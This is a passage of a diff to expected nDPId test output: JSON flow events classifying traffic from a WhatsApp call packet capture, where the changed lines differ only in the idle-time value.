{"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"169.254.166.207","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582244297,"flow_last_seen":1432582244462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582331561,"flow_last_seen":1432582331825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310665,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1432582296339,"flow_last_seen":1432582310668,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":2153,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296339,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310667,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296337,"flow_last_seen":1432582310664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582250339,"flow_last_seen":1432582250618,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00848{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 